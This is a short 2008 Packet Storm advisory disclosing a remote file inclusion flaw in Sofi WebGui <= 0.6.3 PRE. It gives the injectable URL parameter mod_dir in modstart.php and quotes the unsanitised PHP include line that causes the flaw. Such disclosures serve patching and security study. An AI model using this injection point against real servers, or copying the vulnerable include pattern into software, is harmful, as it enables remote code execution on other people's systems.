sofiwebgui-rfi.txt

2008-09-24T00:00:00
ID PACKETSTORM:70259
Type packetstorm
Reporter dun
Modified 2008-09-24T00:00:00

Description

                                        
                                            ` :::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ dun[at]strcpy.pl ]  
  
#########################################################################  
# [ Sofi WebGui <= 0.6.3 PRE ] Remote File Inclusion Vulnerability #  
#########################################################################  
#  
# Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu  
# Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz  
#  
# Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???]  
#   
#  
# Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26)  
#  
# ...  
# if($ff=="") $ff = "index";  
# $file_name = "m_$ff.php";  
#  
# //start web module  
# include("$mod_dir/$file_name"); // RFI  
# ...   
#  
#  
###############################################  
# Greetz: D3m0n_DE * str0ke * and otherz..  
###############################################  
  
[ dun / 2008 ]   
  
*******************************************************************************************  
  
  
`